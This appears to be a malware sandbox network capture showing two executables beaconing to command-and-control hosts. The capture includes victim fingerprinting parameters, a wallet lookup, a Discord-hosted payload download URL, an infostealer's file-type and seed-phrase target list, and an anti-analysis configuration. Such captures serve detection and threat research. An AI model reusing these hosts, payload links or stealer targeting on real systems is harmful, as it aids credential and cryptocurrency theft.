2023-11-18 09:03:02 UTC	10660	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f7GxiM0%2Fq8OEsqkZSzE0t9WN9MitYJpgHfKSkew9LbJVE7GylxWdKXHf7HwBvvDbqnCi6bEUEJoXOL9oPxGg3GtJtvK2sUrjR6Nd2ggq%2BbuUzCgxVu169waUCWlBnyCE5m4Z%2BAoO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09b4ab67681b-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:02 UTC	10660	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	104.21.89.193	443	192.168.2.4	49791	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:01 UTC	10659	OUT	GET /getwallet.php?id=1444&wallet=steam HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:02 UTC	10660	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f7GxiM0%2Fq8OEsqkZSzE0t9WN9MitYJpgHfKSkew9LbJVE7GylxWdKXHf7HwBvvDbqnCi6bEUEJoXOL9oPxGg3GtJtvK2sUrjR6Nd2ggq%2BbuUzCgxVu169waUCWlBnyCE5m4Z%2BAoO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09b4ab67681b-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:02 UTC	10660	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.4	49792	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:01 UTC	10659	OUT	GET //ready.php?id=4627883 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:02 UTC	10659	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rHPfNLkbsgmxabxYWnalW8TV%2FZpduCKJZDcLmzohyqeUKs8OairHfLmyq4oRbtHdQH1YCrIEtbP2h8F%2FkHOT6S0Yaz6VQO5zvy5xjH65upRexqebIBMpfj%2Bih4%2FE3QCNykzgEXJv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09b4ea8b307c-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:02 UTC	10660	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	104.21.89.193	443	192.168.2.4	49792	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:01 UTC	10659	OUT	GET //ready.php?id=4627883 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:02 UTC	10659	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rHPfNLkbsgmxabxYWnalW8TV%2FZpduCKJZDcLmzohyqeUKs8OairHfLmyq4oRbtHdQH1YCrIEtbP2h8F%2FkHOT6S0Yaz6VQO5zvy5xjH65upRexqebIBMpfj%2Bih4%2FE3QCNykzgEXJv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09b4ea8b307c-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:02 UTC	10660	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	104.21.89.193	443	192.168.2.4	49795	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:04 UTC	10660	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:04 UTC	10661	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0lzMgYFKr4HJZMPlkuXZjYiofboix2dd9%2BVUJ9g%2B%2B%2FFpxSeoCkFoMdT0Eq8vW1o1VFk%2FsEhpWXug%2BJ9o%2FC9dUWVmLnr4iyt4J6Ej3G2hCuTHLv2SW%2B74iGJMXZazfijmjBobtgA7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09c65aabc3b6-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:04 UTC	10661	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:04 UTC	10661	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.4	49795	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:04 UTC	10660	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:04 UTC	10661	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0lzMgYFKr4HJZMPlkuXZjYiofboix2dd9%2BVUJ9g%2B%2B%2FFpxSeoCkFoMdT0Eq8vW1o1VFk%2FsEhpWXug%2BJ9o%2FC9dUWVmLnr4iyt4J6Ej3G2hCuTHLv2SW%2B74iGJMXZazfijmjBobtgA7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09c65aabc3b6-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:04 UTC	10661	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:04 UTC	10661	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.4	49793	104.21.35.168	443	C:\Users\user\AppData\Local\932079.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:04 UTC	10661	OUT	GET /test HTTP/1.1 Host: trecube.com Connection: Keep-Alive
2023-11-18 09:03:05 UTC	10661	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ulf2hrnkc557qrt6p2j9qjoh82; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JftANk4kBjvlkj4qZLcO7I21dd%2BieNaLLFhvVHW8dExUry0pyCS0Q7GfYjYhb038vityLi0urmHxWHuB77LTMjWLA9WDpzSCLvYn2uULQgmg5DKvw3xfmJYi6y1%2Fgw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09c6ddf5682b-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:05 UTC	10662	IN	Data Raw: 32 0d 0a 31 33 0d 0a Data Ascii: 213
2023-11-18 09:03:05 UTC	10662	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	104.21.35.168	443	192.168.2.4	49793	C:\Users\user\AppData\Local\932079.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:04 UTC	10661	OUT	GET /test HTTP/1.1 Host: trecube.com Connection: Keep-Alive
2023-11-18 09:03:05 UTC	10661	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ulf2hrnkc557qrt6p2j9qjoh82; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JftANk4kBjvlkj4qZLcO7I21dd%2BieNaLLFhvVHW8dExUry0pyCS0Q7GfYjYhb038vityLi0urmHxWHuB77LTMjWLA9WDpzSCLvYn2uULQgmg5DKvw3xfmJYi6y1%2Fgw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09c6ddf5682b-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:05 UTC	10662	IN	Data Raw: 32 0d 0a 31 33 0d 0a Data Ascii: 213
2023-11-18 09:03:05 UTC	10662	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.4	49797	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:05 UTC	10662	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:06 UTC	10662	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b1PxEWNT8N4fz9aXVySRpC1SZORCq%2F8RRTYS6LSj8MbwUlV9wHX%2BCLslud541GqfZl56Yi3ptUtFoSuUOEsB%2B%2FA1J29NUeNrxLRn25KsjPCM6CBvhDgB7RkvTMaNvMxfZuGI8n9m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09cbdc553093-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:06 UTC	10663	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:06 UTC	10663	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	104.21.89.193	443	192.168.2.4	49797	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:05 UTC	10662	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:06 UTC	10662	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b1PxEWNT8N4fz9aXVySRpC1SZORCq%2F8RRTYS6LSj8MbwUlV9wHX%2BCLslud541GqfZl56Yi3ptUtFoSuUOEsB%2B%2FA1J29NUeNrxLRn25KsjPCM6CBvhDgB7RkvTMaNvMxfZuGI8n9m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09cbdc553093-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:06 UTC	10663	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:06 UTC	10663	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.4	49798	104.21.35.168	443	C:\Users\user\AppData\Local\932079.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:05 UTC	10662	OUT	GET /getext?id=1 HTTP/1.1 Host: trecube.com
2023-11-18 09:03:06 UTC	10663	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dk996h3pvkjvh5ngsvrh069nk8; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6zUKAYboiO9Bg5ImmeSHsP9NwfwN0y9PEmpaBoHxnM6YDic36qQwNhIovnmRRzB9S7Dl60FliwlDyVkAbkA5Ht4PBeRCHWrHKWjejdGgRTaxbMSLQ7F1SibUbVje%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09cdaef9284a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:06 UTC	10664	IN	Data Raw: 34 38 0d 0a 2a 2e 64 6f 63 3b 2a 2e 64 6f 63 78 3b 2a 2e 6a 73 6f 6e 3b 2a 2e 6f 64 74 3b 2a 2e 68 74 6d 6c 3b 2a 2e 64 61 74 3b 2a 2e 70 64 66 3b 2a 2e 72 74 66 3b 2a 2e 65 6d 6c 3b 2a 2e 77 61 6c 6c 65 74 3b 2a 73 65 65 64 2a 0d 0a Data Ascii: 48.doc;.docx;.json;.odt;.html;.dat;.pdf;.rtf;.eml;.wallet;seed
2023-11-18 09:03:06 UTC	10664	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	104.21.35.168	443	192.168.2.4	49798	C:\Users\user\AppData\Local\932079.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:05 UTC	10662	OUT	GET /getext?id=1 HTTP/1.1 Host: trecube.com
2023-11-18 09:03:06 UTC	10663	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dk996h3pvkjvh5ngsvrh069nk8; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6zUKAYboiO9Bg5ImmeSHsP9NwfwN0y9PEmpaBoHxnM6YDic36qQwNhIovnmRRzB9S7Dl60FliwlDyVkAbkA5Ht4PBeRCHWrHKWjejdGgRTaxbMSLQ7F1SibUbVje%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09cdaef9284a-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:06 UTC	10664	IN	Data Raw: 34 38 0d 0a 2a 2e 64 6f 63 3b 2a 2e 64 6f 63 78 3b 2a 2e 6a 73 6f 6e 3b 2a 2e 6f 64 74 3b 2a 2e 68 74 6d 6c 3b 2a 2e 64 61 74 3b 2a 2e 70 64 66 3b 2a 2e 72 74 66 3b 2a 2e 65 6d 6c 3b 2a 2e 77 61 6c 6c 65 74 3b 2a 73 65 65 64 2a 0d 0a Data Ascii: 48.doc;.docx;.json;.odt;.html;.dat;.pdf;.rtf;.eml;.wallet;seed
2023-11-18 09:03:06 UTC	10664	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.4	49800	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:06 UTC	10664	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:07 UTC	10664	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5dMgNHF3fWQQ%2B1gS3xdNS%2BB4AcMd8QkeTWHG0WYweCqn4ET5jAg3rY6MAn1gqHVmQM5epNpsa%2B2iVbnAxfCF83AO%2FTFlZ0d3kzmAntrk4oyFhRxlxIm48JYfj1vB55Jxm3SrTuNV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09d32f916a17-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:07 UTC	10664	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:07 UTC	10664	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	104.21.89.193	443	192.168.2.4	49800	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:06 UTC	10664	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:07 UTC	10664	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5dMgNHF3fWQQ%2B1gS3xdNS%2BB4AcMd8QkeTWHG0WYweCqn4ET5jAg3rY6MAn1gqHVmQM5epNpsa%2B2iVbnAxfCF83AO%2FTFlZ0d3kzmAntrk4oyFhRxlxIm48JYfj1vB55Jxm3SrTuNV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09d32f916a17-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:07 UTC	10664	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:07 UTC	10664	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	104.21.35.168	443	192.168.2.4	49801	C:\Users\user\AppData\Local\932079.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:06 UTC	10664	OUT	GET /getjson?id=1 HTTP/1.1 Host: trecube.com
2023-11-18 09:03:07 UTC	10664	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jshb1pbi8ej6om1vq9lsff7359; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0rrW79jQ1zwy8GW%2B1y%2BNHPQ0m5tR0Pq4pgSdgQ5AU3j%2ByrfGqR6bhqjj0d8D7g%2BTsMVlV4Dw8M3sfI5c9FGrdx0iUMEYSsrde0rWWqS3wX3TG9QBMJBfP9uxXC7O6w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09d3fe16c6ad-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:07 UTC	10665	IN	Data Raw: 62 30 0d 0a 7b 0d 0a 09 22 64 65 62 75 67 22 3a 20 22 31 22 2c 0d 0a 09 22 65 6d 75 6c 61 74 65 22 3a 20 22 31 22 2c 0d 0a 09 22 76 69 72 74 75 61 6c 62 6f 78 22 3a 20 22 31 22 2c 0d 0a 09 22 76 69 72 75 73 74 6f 74 61 6c 22 3a 20 22 31 22 2c 0d 0a 09 22 65 72 72 6f 72 22 3a 20 22 30 22 2c 0d 0a 09 22 65 72 72 6f 72 6e 61 6d 65 22 3a 20 22 45 72 72 6f 72 22 2c 0d 0a 09 22 65 72 72 6f 72 74 65 78 74 22 3a 20 22 46 75 63 6b 20 6d 65 20 6e 6f 77 20 70 6c 65 61 73 65 22 0d 0a 09 22 63 6f 6d 70 65 74 69 74 6f 72 22 3a 20 22 30 22 0d 0a 7d 0d 0a Data Ascii: b0{"debug": "1","emulate": "1","virtualbox": "1","virustotal": "1","error": "0","errorname": "Error","errortext": "Fuck me now please""competitor": "0"}
2023-11-18 09:03:07 UTC	10665	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.4	49801	104.21.35.168	443	C:\Users\user\AppData\Local\932079.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:06 UTC	10664	OUT	GET /getjson?id=1 HTTP/1.1 Host: trecube.com
2023-11-18 09:03:07 UTC	10664	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jshb1pbi8ej6om1vq9lsff7359; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0rrW79jQ1zwy8GW%2B1y%2BNHPQ0m5tR0Pq4pgSdgQ5AU3j%2ByrfGqR6bhqjj0d8D7g%2BTsMVlV4Dw8M3sfI5c9FGrdx0iUMEYSsrde0rWWqS3wX3TG9QBMJBfP9uxXC7O6w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09d3fe16c6ad-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:07 UTC	10665	IN	Data Raw: 62 30 0d 0a 7b 0d 0a 09 22 64 65 62 75 67 22 3a 20 22 31 22 2c 0d 0a 09 22 65 6d 75 6c 61 74 65 22 3a 20 22 31 22 2c 0d 0a 09 22 76 69 72 74 75 61 6c 62 6f 78 22 3a 20 22 31 22 2c 0d 0a 09 22 76 69 72 75 73 74 6f 74 61 6c 22 3a 20 22 31 22 2c 0d 0a 09 22 65 72 72 6f 72 22 3a 20 22 30 22 2c 0d 0a 09 22 65 72 72 6f 72 6e 61 6d 65 22 3a 20 22 45 72 72 6f 72 22 2c 0d 0a 09 22 65 72 72 6f 72 74 65 78 74 22 3a 20 22 46 75 63 6b 20 6d 65 20 6e 6f 77 20 70 6c 65 61 73 65 22 0d 0a 09 22 63 6f 6d 70 65 74 69 74 6f 72 22 3a 20 22 30 22 0d 0a 7d 0d 0a Data Ascii: b0{"debug": "1","emulate": "1","virtualbox": "1","virustotal": "1","error": "0","errorname": "Error","errortext": "Fuck me now please""competitor": "0"}
2023-11-18 09:03:07 UTC	10665	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49745	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:34 UTC	398	OUT	GET /dlls/System.Data.SQLite.EF6.dll HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:35 UTC	398	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:35 GMT Content-Type: application/x-msdos-program Content-Length: 201528 Connection: close Last-Modified: Tue, 02 Nov 2021 17:44:38 GMT ETag: "31338-5cfd1d8ebcd80" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2ewIx39srdRGGzxOMHak08TKHhzuul2RYw65y%2Fd%2FYsBA%2FX7ZLNT3fYMPKtundvnSkGP1qPsHJ%2FsaH%2B1UoBlY05tFqxWM2%2Fdjiwao000Z7AWMDOYb6AXiYSQFCaiWXKG21l26VPQB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f090cd8d9eb7f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:35 UTC	399	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b6 70 81 61 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 c8 02 00 00 08 00 00 00 00 00 00 72 e7 02 00 00 20 00 00 00 00 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 c1 29 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpa" 0r @)`
